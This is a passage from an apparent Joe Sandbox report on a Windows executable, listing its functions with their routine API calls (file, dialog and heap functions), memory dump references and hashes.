Instruction Fuzzy Hash: EB116464B08B4287E600AF1AB84406CF7E1AB89FE0BD44539CA1CC3321DF3CF6418394

Function 00007FF7C0184D50 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF7C0184DB1
GetLastError.KERNEL32 ref: 00007FF7C0184DBE

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
Instruction ID: e9cd951a7888f8e3d31ef161450b9e5778789d14fd0e8adafc8d19736869dc42
Opcode Fuzzy Hash: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
Instruction Fuzzy Hash: 7F116221A1864183E760AF65B44027DE360EB54FB4F954331EA3D927D4DF2CF692C751

Function 00007FF7C018215C Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C018A8AC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C018A904
Part of subcall function 00007FF7C018A8AC: SetDlgItemTextW.USER32 ref: 00007FF7C018A973
Part of subcall function 00007FF7C018A8AC: GetWindowRect.USER32 ref: 00007FF7C018A9AD
Part of subcall function 00007FF7C018A8AC: GetClientRect.USER32 ref: 00007FF7C018A9BB

GetDlgItem.USER32 ref: 00007FF7C01821AC
SetDlgItemTextW.USER32 ref: 00007FF7C01821C8

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Item$RectText$ClientWindowswprintf
String ID:
API String ID: 402765569-0
Opcode ID: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
Instruction ID: c64c4d1b97fd30aad8618f4713b3f2b9887e933a1c666dd515bdf0bb934e9116
Opcode Fuzzy Hash: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
Instruction Fuzzy Hash: 72016D10A1824683FA1A7F61B44827CD7916F45F64F990134CE0D863DA9F2CF68583A1

Function 00007FF7C01A5AE0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C01A5B10

Part of subcall function 00007FF7C01A674C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7C01A6755

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C01A5B16

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: 2418f657b74aff0bbbd954836f942504a57e752e7ff65bc5a56a0d55cdee3a56
Instruction ID: 130bb71e501d76123c9a5263a9c29bc4a84c4e04be37a1544bc3696e42c75ee6
Opcode Fuzzy Hash: 2418f657b74aff0bbbd954836f942504a57e752e7ff65bc5a56a0d55cdee3a56
Instruction Fuzzy Hash: 2BE09241E1D20746FA583EA124591BDC0840F18B71E981B30E93E863C3AE18B46681B0

Function 00007FF7C01B0E1C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL ref: 00007FF7C01B0E32
GetLastError.KERNEL32 ref: 00007FF7C01B0E44

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
Instruction ID: b21067c61689fc0c0da94f58b6908abb6314e053d227758ac84a0e96ed3e4a0e
Opcode Fuzzy Hash: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
Instruction Fuzzy Hash: 96E08690E092434BFF067FB2788407DD2906F58F61B844434DD0DC63A1EF6CB58546A4

Function 00007FF7C0186858 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0186ADF

Part of subcall function 00007FF7C0190AD0: CompareStringW.KERNEL32 ref: 00007FF7C0190B36

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CompareString_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1017591355-0
Opcode ID: 19fa4a8e4b1c701ff79f09de193f0e6c9bff8c4b1f7545da9f0c168cfcf595ef
Instruction ID: a5d8f9993bab56ad69ff3f1c9b7ed40a980ff6be5f4e89f146a87465df36efc4
Opcode Fuzzy Hash: 19fa4a8e4b1c701ff79f09de193f0e6c9bff8c4b1f7545da9f0c168cfcf595ef
Instruction Fuzzy Hash: 7F610411E0C64347EA68BE11641527EE2999F40FF4F968231DA4E977C5EF2CF64183A2

Function 00007FF7C0194A98 Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0194D6D

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 9ca4a83d2b63779bf708ac485e26fdd1a63016ab321697bfea32e07a43e704da
Instruction ID: 2140fb83954e0c77380fc38384b829854539159ffecc7f29413ee1bb41b22d7b
Opcode Fuzzy Hash: 9ca4a83d2b63779bf708ac485e26fdd1a63016ab321697bfea32e07a43e704da
Instruction Fuzzy Hash: F7714A22F1965247FB10EF66B4446BDE2A2AF44FB4F904131E92E977D5DF28B48082A0

Function 00007FF7C01976F8 Relevance: 1.7, APIs: 1, Instructions: 178COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0186288: FindClose.KERNELBASE(?,?,?,00007FF7C018FFA5), ref: 00007FF7C01862BD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01979DB

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: badc78b1171942a7d3096e5594fb818a2bb200fdfb059f9f01d9a7c201ae8695
Instruction ID: 095633e736e8653862482cd64fe92782571a0c368197721d28d489c4dda52d2d
Opcode Fuzzy Hash: badc78b1171942a7d3096e5594fb818a2bb200fdfb059f9f01d9a7c201ae8695
Instruction Fuzzy Hash: F4811661E08B4287FA50BF15B84827CE6A2AF85F74FD80135D95DC2795DF6CFA8483A0

Function 00007FF7C0199A70 Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0199CF4

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 552ce37b39ad09a62a9f47879426a5d42276c048784179878e98e6da6e12f1cc
Instruction ID: d014d07bf3e74c75c1d09b3d6f5a55bfc713284c528dc42b2a0d4ceab635e970
Opcode Fuzzy Hash: 552ce37b39ad09a62a9f47879426a5d42276c048784179878e98e6da6e12f1cc
Instruction Fuzzy Hash: 66616521A1C78243EA60BF18F8852FDE395EF95B64FC04131D98D86BA5DF6CF58087A0

Function 00007FF7C018552C Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018569C

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 54602dd0ec26bd2d79ceeb5ca0cc47b122a19acca21d15c1e6fc8212b5c90648
Instruction ID: 480cdb23b1d5132ee37d8f5cbde96759f8df9cfc7f8c703af8c752f5b278f98e
Opcode Fuzzy Hash: 54602dd0ec26bd2d79ceeb5ca0cc47b122a19acca21d15c1e6fc8212b5c90648
Instruction Fuzzy Hash: 2741AE22A08B4542EB10AF24E14536DE3A1EB44FF8FD50234DA5D877A9EF2DF64187A1

Function 00007FF7C01AF2D8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7C01AF300

Part of subcall function 00007FF7C01AF490: GetModuleHandleExW.KERNEL32 ref: 00007FF7C01AF4B0
Part of subcall function 00007FF7C01AF490: GetProcAddress.KERNEL32 ref: 00007FF7C01AF4C6
Part of subcall function 00007FF7C01AF490: FreeLibrary.KERNEL32 ref: 00007FF7C01AF4EB

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
Instruction ID: ad3487e57bd63c33e8eca348cabb84823de46d9b1fd8c172267593b2ac914bfe
Opcode Fuzzy Hash: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
Instruction Fuzzy Hash: 3F419721A1962283EB24BF91B49023DE2A1BF44F61F84403AD91EC7792DF6CF95487F0

Function 00007FF7C0194EE4 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0186288: FindClose.KERNELBASE(?,?,?,00007FF7C018FFA5), ref: 00007FF7C01862BD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0195023

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: 8e1b62b4adbf0026937254bcfc6fd8c1cb42753d58653c909ec536b3b6315e0b
Instruction ID: 4eb8140db315f056063f4137854b5e5828cb5b922e546ec2561416e238fcba0b
Opcode Fuzzy Hash: 8e1b62b4adbf0026937254bcfc6fd8c1cb42753d58653c909ec536b3b6315e0b
Instruction Fuzzy Hash: 11316021B1874683EA10AF19F44477DE391BF85BA0FC40235EA9D87B95DF2CF44187A0

Function 00007FF7C01B46DC Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B4710

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
Instruction ID: 0820a21135a09f69ea6a56ae0c5b32d672c2f114ed7062a629cbf57231e5ccd4
Opcode Fuzzy Hash: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
Instruction Fuzzy Hash: CB11597691868283E620AF12B48057DF2A5FB41BA0FD44434EA9D87BD1DF2CF9408BA0

Function 00007FF7C01A376C Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C01A2BF4: GetDlgItem.USER32 ref: 00007FF7C01A2C33
Part of subcall function 00007FF7C01A2BF4: ShowWindow.USER32 ref: 00007FF7C01A2C59
Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2C6E
Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2C86
Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2CA7
Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2CC3
Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D06
Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D24
Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D38
Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D62
Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D7A

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A3807

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 4003826521-0
Opcode ID: 25e6bccfff313813c7b6651f727f9e62e310442583c3d4eabf682956948fe027
Instruction ID: 2bd2312ff4f8db0d1fa8bf0b3f689f17512797d640fca5feb7a6bb96b2b9fb45
Opcode Fuzzy Hash: 25e6bccfff313813c7b6651f727f9e62e310442583c3d4eabf682956948fe027
Instruction Fuzzy Hash: C801A5A2A2868543EA14AF64E04636DE351EF89BB0F900331F69C8ABC6DF2CF1508650

Function 00007FF7C01B2E94 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF7C01B2EE9

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 973ac4a955278155064161a4d63dbe6b99ccc62035c0026a498718668b27418c
Instruction ID: 0a5fba05f94fec94608e6c41ab663476bd025ac96efd6342782997193b4f96e6
Opcode Fuzzy Hash: 973ac4a955278155064161a4d63dbe6b99ccc62035c0026a498718668b27418c
Instruction Fuzzy Hash: 13F03C84B0920287FE557E6669456BED2905F88FA0F880434CE0DC67D2DF2CF58842B4

Function 00007FF7C0186288 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C018647C: FindFirstFileW.KERNELBASE ref: 00007FF7C01864CB
Part of subcall function 00007FF7C018647C: FindFirstFileW.KERNELBASE ref: 00007FF7C018651E
Part of subcall function 00007FF7C018647C: GetLastError.KERNEL32 ref: 00007FF7C018656F

FindClose.KERNELBASE(?,?,?,00007FF7C018FFA5), ref: 00007FF7C01862BD

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
Instruction ID: d88859add7192547d0f5070ba5cb7f12ca8a420ae6a13dca8f8fac466ad7df52
Opcode Fuzzy Hash: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
Instruction Fuzzy Hash: EAF0D16290824186DA50BF74A00417CF7619B1AFB8F550374EA7C473CBCF18E544C7A6

Function 00007FF7C01842D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7C018427E), ref: 00007FF7C01842F6

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
Instruction ID: c55c47fc90848f2a1da142a61afa3744f74362cdea84f72588f55fdccc49d73d
Opcode Fuzzy Hash: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
Instruction Fuzzy Hash: 31F08122A0864297EB249F21F04037DF760EB04F79F9A4334DA39812D4DF28EA95C3A1

Function 00007FF7C01B0E5C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF7C01B0E9A

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6cb8d6af9808862ce5c6d1e218701f51077bf56df55e472ff95833f18a2663ca
Instruction ID: d813103fded45ed2a9131c32838268430973a77c7ac226aaa29d2aea58024e3d
Opcode Fuzzy Hash: 6cb8d6af9808862ce5c6d1e218701f51077bf56df55e472ff95833f18a2663ca
Instruction Fuzzy Hash: F3F03080A192428BFA567E61794167DD1804F84F71F884A349C6EC53C1DF2CF48085B8

Function 00007FF7C01900F0 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32 ref: 00007FF7C01A3AAA

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
